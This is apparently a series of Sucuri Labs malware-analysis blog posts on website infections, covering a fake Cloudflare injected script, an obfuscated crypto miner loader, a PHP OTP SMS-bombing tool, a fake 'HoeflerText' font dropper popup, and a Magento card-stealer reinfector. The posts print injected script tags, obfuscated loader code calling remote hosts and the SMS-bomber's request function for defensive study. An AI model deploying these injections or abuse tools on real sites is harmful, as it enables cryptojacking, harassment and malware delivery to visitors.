Fake cloudflare injection

Seeing malicious campaigns using domain names that resemble big market players is not news anymore. This time I\'ll talk about the new redirects of cloudflare.pw.****

The domain, registered in 2017, has been used as a doorway to other suspicious content since then.

But this time it looks like they want to leverage the SSL adoption rush to hide the infection, since the script is loading content from https://*.contentssl.com.

The attackers are not only infecting files but it seems they are exploiting SQLinjection vulnerabilities to add the following javascript to the database too:

<script id="lg210a" src="https://cloudflare.pw/cdn/statslg30.js" type="text/javascript"></script>

The script id and the remote javascript file called can change. The file can be either statslg[30 or 50].js or statslelivros20.js. All those variations will load similar js. The only difference will be the final host, keeping the contentssl.com domain.

We also found fake Jquery scripts injected on infected sites, so, if you see any of those entries on your site, perform a full check on it.

Aug 8, 2018 by Fioravante Souza

Obfuscated JavaScript Crypto Miner

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, Crypto Miners were ran on customers visiting the website.

By looking at the following malware this can be discouraging and frightening, but let’s review the malware code and see how the attacker cleverly created Crypto Miner code which was placed into the ./wp-content/themes/responsive/header.php file:

< script >$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_.
…...

The attacker placed the code at the top of a legit file. When the website is opened, it executed the JavaScript code and started mining Cryptocurrencies.

Let’s work through the malicious code step by step to see how it works.

The first step is to get the code to make more sense, so we are going to get it in a more readable format.

The malicious code was placed between the opening and closing JavaScript tags as indicated below:

< script >
    $ = ~[];
    $ = {
        ___: ++$,
        $$$$: (![] + "")[$],
        __$: ++$,
        $_$_: (![] + "")[$],
        _$_: ++$,
        $_$$: ({} + "")[$],
        $$_$: ($[$] + "")[$],
        _$$: ++$,
        $$$_: (!"" + "")[$],
        $__: ++$,
        $_$: ++$,
        $$__: ({} + "")[$],
        $$_: ++$,
        $$$: ++$,
        $___: ++$,
        $__$: ++$
    };
.....

Once the obfuscated malware has been decoded, it contained the following JavaScript code that will be used in the next phase of the Cryptocurrency.

If we look at the malicious code, we can see that the variable “el” contains a script object that will be pulling the final Crypto Miner payload from “web[.]clod[.]pw”

var el = document.createElement('script');el.src='https://web[.]clod[.]pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTN…….

In comparison, let’s look at the Crypto Miner payload that was pulled from “web[.]clod[.]pw” and see how it works.

This is a small piece of the malware that was pulled:

var _0xce82=['Y3VycmVudEpvYg==','WGZxVlU=','Z2V0VG90YWxIYXNoZXM=','dmxH','ZlBsVHA=','UmhsVEQ=','Tndoa0k=','RkhQZ2c=','Z2V0QWNjZXB0ZWRIYXNoZXM=','VXZV','WnZa','aHJjYWQ=','anB1cXI=','dGtMSkE=',
…...

Once we decode the content that was pulled from “web[.]clad[.]pw”, we see it contains many functions to check for crawlers and mobile devices and then decides whether it can start the Crypto miners:

if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop
|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i
|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.
(browser|link)|vodafone|wap|windows ce|xda|xiino/i [_0x2ce8('0x7d')](b) || 
/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|
as(te|us)|attw|au(di|\-m|r |s ….

After all the functions have been tested and verified, it will run the Cryptocurrency miner and execute the Crypto miner script by way of your computer hardware.The mining process will start mining Cryptocurrency for the hacker:

if (![]) {
    if (document[_0x2ce8('0xae')][_0x2ce8('0xaf')](/google|yandex|mail|vk.com|ask|bing/) || localStorage[_0x2ce8('0xb0')](_0x2ce8('0xab'))
 || sessionStorage && sessionStorage[_0x2ce8('0xb0')](_0x2ce8('0xab')))
 {
        localStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        sessionStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        runMiner();

    }
} else {
    runMiner();
}
if (document[_0x2ce8('0x1d3')]) {
    var node = document[_0x2ce8('0x1d3')](_0x2ce8('0x1cd'));
    if (node && node[_0x2ce8('0x1d5')]) {
        node[_0x2ce8('0x1d5')]();
    }
}

If you think your website is infected, you can always trust the engineers from Sucuri to check it and clean it for you by visiting and subscribing at https://sucuri.net.

Aug 1, 2018 by Samuel Odendaal

How Some OTP Systems Can Be Used to...

I recently came across an interesting index.php file and its corresponding directory on a compromised website. I loaded it in a testing environment and immediately it was apparent that this malicious PHP file was different than your average spam tool:


GUI for this spamming tool. *Note - the "No Telp" telephone number field and the "Jumlah SMS" number of SMS field.

This particular malicious file\'s GUI stood out because it would send SMS(text) messages to a user-specified cellular telephone number. This isn\'t a standard operating procedure for most of the spam campaigns that I have encountered over the years, as they try to target as many email addresses, or phone numbers, as possible to increase the attack surface and the probability of a successful delivery.

AA further analysis of the code within the malicious spam tool file revealed further information:

public function Verif()
    {
        $url = "https://www.tokocash.com/oauth/otp";
        $no = $this->no;
        $type = $this->type;
        if ($type == 1) {
            $data = "msisdn={$no}&accept=";
        }elseif ($type == 2) {
            $data = "msisdn={$no}&accept=call";
        }
        $send = $this->sendC($url, null, $data);
        // echo $send;
        if (preg_match('/otp_attempt_left/', $send)) {
                print('OTP berhasil Dikirim!<br>');
            } else {
                print('OTP Gagal Dikirim!<br>');
            }
    }

sendC is a function defined earlier that just constructs a cURL request with special headers

After checking this PHP file's code, it's clear that the SMS spam message isn't actually being sent from the web server hosting the compromised website. Instead, the PHP file's coding would be executed from the web page previously shown. Then it would submit a specially crafted cURL request (saved as function sendC) to an Indonesian website that had an authentication system utilizing a OTP feature. The request sent to this website's OTP system would include parameters in the URL that include the victim's phone number and whether to perform the OTP two-factor authentication via phone call or SMS text message.

Apparently, it turns out that this PHP script is nothing more than a "prank" spam tool that will just continuously send SMS or phone calls to the victim's phone number until the OTP system starts rejecting the requests. It's an interesting method of "prank" spam in regards to how the SMS message is sent out. It doesn't use the malicious user's server nor the compromised website's hosting server but rather abuses a legitimate TokoCash/Tokopedia's authentication service to bombard the phone number. Notice in the screenshot spamming tool, the word bom, which means "bomb" in Indonesian.

I reached out to this Indonesian website to inform them of the prank spam issue with their OTP system so that they can hopefully implement some access control security to harden the OTP from this type of abuse.

Jul 25, 2018 by Luke Leal

Using Innocent roles to hide admin users

All across the internet we find guides and tutorials on how to keep your WordPress site secure, and they all approach the concept of user roles, but not many actually approach the capabilities of those roles.


The way the capabilities are handled on WordPress make it quite easy to change what each role is allowed to do.

How WordPress Sets Role Capabilities

To better understand, we need to first look at how WordPress manages the capabilities of the roles (what it is allowed to do, be it either add/remove users, create/delete posts, etc...). This is defined on the database, in the wp_options table option_name - wp_user_roles

The Risk

As we previously experienced, attackers are focusing on modifying serialized data within the wp_options table.Due to the feeling that webmasters understand the role “Subscriber” can’t do much about this becomes a serious problem attackers can leverage by simply modifying the wp_user_roles field on the wp_options table (see below):

(Note: The attackers first need to either compromise your website or gain database access in order to accomplish this.)

Attackers can quite easily give every subscriber full administration capabilities. Allow me to show you by using the plugin Capability Manager Enhanced

Any subscriber would be able to do pretty much whatever they wanted without you noticing because the list of users would still list the same number of administrators and subscribers.

The only problem with this is that “Subscriber” is a full administrator.

If we compare it with how it is supposed to look under the default role settings, we can see how damaging the small change can be for the website.

Conclusion

What if instead of just one subscriber, there were hundreds, even thousands? What if it was a shop and all your customers were now basically administrators?

WordPress does not have a mechanism to warn a Webmaster if roles other than the “Administrator” has those capabilities.Seeing as this can be set on any role present on your website, it’s very important to keep a sharp eye on the capabilities of each role (especially post-compromise) as it can be easily used as a backdoor to your website. Usage of plugins that manage the capabilities can make this easier for webmasters without technical know-how.

Jul 18, 2018 by Cesar Anjos

Hackers Are Just as Vulnerable as You

I came across some interesting defacement pages recently and noticed a peculiar JavaScript injection included within each source code of the defaced websites. As shown below, this JavaScript injection was peculiar as it seemingly provided no benefit to the hacker:

<script>
    ANCHORFREE_VERSION = "623161526"

<script type='text/javascript'>
    var _AF2$ = {
        'SN': 'HSSHIELD00TN',
        'IP': '69.22.172.11',
        'CH': 'HSSCNL000393',
        'CT': '0',
        'HST': '&sessStartTime=0&SFLAG=1&in=1423962910_84044764|d,1553137850|w,1553137850|m,1553137850|t&out=1423962910_23400718|d,305397307|w,305397307|m,305397307|t&NUM_VID=2&NUM_VID_TS=1423962310&bChrome=40&pv=5&clsBtnCnt=14&fav=8&fvidat=0&fvidv=0&accessLP=1',
        'AFH': 'hss306',
        'RN': Math.floor(Math.random() * 999),
        'TOP': (parent.location != document.location || top.location != document.location) ? 0 : 1,
        'AFVER': '3.69',
        'fbw': false,
        'FBWCNT': 0,
        'FBWCNTNAME': 'FBWCNT_CHROME',
        'NOFBWNAME': 'NO_FBW_CHROME',
        'B': 'c',
        'VER': 'nonus'
    };
    if (_AF2$.TOP == 1) {
        document.write("<scr" + "ipt src='http[:]//box.anchorfree.net/insert/insert.php?sn=" + _AF2$.SN + "&ch=" + _AF2$.CH + "&v=" + ANCHORFREE_VERSION + 6 + "&b=" + _AF2$.B + "&ver=" + _AF2$.VER + "&afver=" + _AF2$.AFVER + "' type='text/javascript'></scr" + "ipt>");
    }

The injected javascript code contains some details from the client\'s connection to the HotSpot Shield VPN server, then runs a javascript file from box.anchorfree.net

I haven\'t come across this type of content within any other forms of malware – just your typical Hacked by _____, or 0wned by _____ message, or an otherwise unwanted defacement of someone\'s website.

It only took a single Google search to determine that anchorfree.net is associated with the popular HotSpot Shield VPN, which has millions of downloads in the Google Play store alone (they also offer browser plugins for non-mobile users). They offer both a free and a paid version of their VPN service, however in the last year or so there have been demands for federal authorities to investigate them for deceptive practices.

(If you are curious about using a VPN for privacy reasons, or already are using one, then I\'d recommend checking out the official complaint here).

So what does this have to do with hackers and their defacement pages? Well, we know that in the majority of cases, the hacker is wanting to anonymize themselves. Nowadays, that usually involves using at least one VPN or more. Often times, the hackers that focus on defacements are more inexperienced and new, so they may lack the inherent suspicion one has to have when dealing with free services like HotSpot Shield VPN or any other free online services they must monetize to remain in operation. Their form of monetization is to inject JavaScript code into the browser requests of their non-paying clients (unsure about the Premium paid version), which is then used with additional JavaScript from a few different third-party domains:

document.write("<style type='text/css' title='AFc_css"
+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{}.AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+"
:visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;
left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>
<style type='text/css'>.AFhss_dpnone{display:none;width:0;height:0}</style>
<img src=\"about:blank\" id=\"AFhss_trk0\" name=\"AFhss_trk0\"
 style=\"display:none\" /><img src=\"about:blank\"id=\"AFhss_trk\" 
name=\"AFhss_trk\" style=\"display:none\"/><iframe src=\"http://anchorfree.us/quantcast.php\" style=\"width:0px;height:0px;display:none;\"></iframe>");

Just a small excerpt of the nearly 2,000 line JavaScript text showcasing some of the hidden CSS styling and also the setup of an invisible iFrame, which is a popular method of delivering malicious JavaScript payloads.

As this article isn't about HotSpot Shield VPN specifically, I won't go too in depth about it, but suffice it to say this JavaScript code from their controlled domains is using tracking images and injecting advertisements (some of which could be malicious) into their client's browser.

The purpose of explaining this, was to showcase how even hackers can be victims to one of the biggest hurdles known in website security and that is the human's ability to override otherwise secure settings. This is most commonly witnessed in a human downloading some type of software – in this case, a free VPN service –unknowingly exposing themselves to malicious or PUP (potentially unwanted programs). Another common method of the human factor failing otherwise secure settings is through social engineering.

In conclusion, one should be suspicious of products advertised as completely free and should try to understand the terms of service (SLA) so they are aware of what they may be giving away or exposed to in exchange for the free service. In these defacement cases, the inexperienced hacker relied upon a free VPN service that was unknowingly injecting JavaScript to his browser and so when they created the defacement page (likely through an online editor or browser interface) it caused the HotSpot Shield VPN JavaScript to get passed as text to the created defacement page rather than executed within the client's browser as is intended.

Jun 15, 2018 by Luke Leal

Fake Font Dropper

A website owner reached out to us to investigate a weird behavior on their site. It was randomly showing a popup window for a missing font and telling the visitors that they are unable to view the content of the site because their own computers are missing a required font by the website called “HoeflerText”, as shown in this screenshot:


The malware tried to trick visitors to click on the “Update” button to download a malicious file called : Font_Update.exe

The code started with this at the top of the injected WordPress core file ./index.php and it’s checking for the browser type and version targeting, in this case, only Chrome browsers, as you can see in the below code:

   <script>    if (!!window.chrome && !!window.chrome.webstore) {         function FPGo() {            search = unescape('%2F%5B%5E%3C%3E%5C%5C%6E%5C%5C%73%5D%2F%69%67%6D');            pr = document.body.innerHTML;            result = pr.match(/>(w?s?.*?)</g);            result_arr = [];            for (var i = 0; i < result.length; i++) {                result_arr[i] = result[i].replace(eval(search), '&#0;')            }            for (var i = 0; i < result.length; i++) {                pr = pr.replace(result[i], result_arr[i])            }            document.body.innerHTML = pr        }        FPGo();    }</script>

The other regex and code is responsible for displaying the page incorrectly to the client. It looks damaged or corrupted to try to convince them that it’s all due to the missing font on their computers.

The other part of the malicious code was this one that’s responsible for showing the popup window and the alert to the visitors about this missing “HoeflerText” font on their computers:

   <div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' />                    <p id="pphh">The "HoeflerText" font wasn't found.</p>                </div>                <div id="odiv9">                    <p id="info1">The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p>                    <p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Font_Update.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p>                    <div id="divtabl">                        <table id="tabl1">                            <tbody id="tbody1">                                <tr id="trtr1">                                    <td id="tdtd1">Manufacturer:</td>                                    <td id="tdtd1">Google Inc. All Rights Reserved</td>                                </tr>                                <tr id="trtr1">                                    <td id="tdtd1">Current version:</td>                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td>                                </tr>                                <tr id="trtr1">                                    <td id="tdtd1">Latest version:</td>                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td>                                </tr>                            </tbody>                        </table>                        <div id="helpimg"><img id="inf0s" alt='' /></div>                    </div>                    <form action="https://another-hacked-website.com/avx/images/x86x.php" method="post" id="form_1d"><input type='hidden' name='infol' value='i+veHk+yCYMGJN0u3V+Nq1SdFdRlNVmXm+k+oC6hANGXowqEYpTQww==' /></form>                    <div id="upe0" onclick="ue0()"><a href="javascript:void(0)" id="b00tn">Update</a></div>                </div>            </div>        </div>    </div>    <div id="popup-container" class="popup-window gc" style="display:none;">        <div class="bigarrow element-animation"></div>

The hackers were storing the hxxps://Another-Hacked-site[.]dom/avx/images/x86x.php file on another hacked website.

Once the visitor clicks on the Update button to download the fix for the missing font, he or she will be redirected to a Dropbox URL that’s hosting the malicious Font_Update.exe file.

Conclusion: This incident is showing how important website security is to both website owners and visitors. It’s a huge responsibility on the website owners end to provide a malware-free website experience to their visitors, members, and customers while on eCommerce sites especially, to avoid infecting their computers and others devices with viruses or spyware that can cause data loss, or steal sensitive information (such as login or credit card info, and passwords) used on other websites for purchases and online banking. Spying on their actions and keylogging it or monitoring and managing their infected computers/smartphones remotely or using it to initiate and launch attacks (i.e: DDoS) plus many other possible malicious actions that can be done by an installed virus/malware on their computers, smartphones, or other devices.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Jun 14, 2018 by Moe Obaid

Magento CC stealer reinfector

We have seen many times in the past few months how attackers are infecting Magento installations to scrape confidential information such as credit cards, logins, and PayPal credentials, but we haven’t approached the methods that they use to ensure that their malicious code is added back, if removed.


Here’s a code we found on /includes/config.php. This is a prime candidate for infections once it is included right on the main index.php so that it loads at every page:

A default config.php file should not be changed by the site owner directly, all the code is added by Magento itself, seeing this code on the file already triggers a warning.

On the first block we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content and write it into specific files related to the payment process or user control:

/app/code/core/Mage/Payment/Model/Method/Cc.php

/app/code/core/Mage/Payment/Model/Method/Abstract.php

/app/code/core/Mage/Customer/controllers/AccountController.php

/app/code/core/Mage/Customer/controllers/AddressController.php

/app/code/core/Mage/Admin/Model/Session.php

/app/code/core/Mage/Admin/Model/Config.php

/app/code/core/Mage/Checkout/Model/Type/Onepage.php

/app/code/core/Mage/Checkout/Model/Type/Abstract.php

The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it, but it makes less obvious for the untrained eye, such as:

$link_a = $link.'YTGgAnrv';

Convert to:

$link_a = 'hxxp://pastebin[.]com/raw/YTGgAnrv';&nbsp

It's not the first time that there’s malicious code being stored on pastebin which is then directly used by attackers to keep their infections more “low-profile” to make their detection harder.

Looking at all the content stored on pastebin[.]com, I found very common variations of malware that intend to steal passwords and credit card information then send them off to external domains for processing or sale such as:

hxxp://magento.ontools[.]net/update

hxxp://www.bgsvetlina[.[com/post.php

The code is pretty similar to other ones we previously approached:

https://labs.sucuri.net/?note=2016/12/13 0:00

https://labs.sucuri.net/?note=2016/11/03 0:00

https://labs.sucuri.net/?note=2016/05/25 0:00

Two interesting facts is the mechanism that the attackers add “error_reporting(0);” to avoid any error leading to the discovery of the infection and that the size of each of the files is verified to check if its necessary to reinfect them again.

As a rule of thumb on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified straight on (I know I do it first thing). 

Removing just the infection that you have a main concern about many times does not suffice to clear your mind. You should always assume someone is out to get you and that they are still inside your website, so looking for other kinds of malware and backdoors is imperative.

For Magento infections like this, you can use our step-by-step guide on how to identify a hack and clean a compromised Magento site. Otherwise, feel free to get in touch and we’ll get you back to tip top shape in no time.

Jun 8, 2018 by Cesar Anjos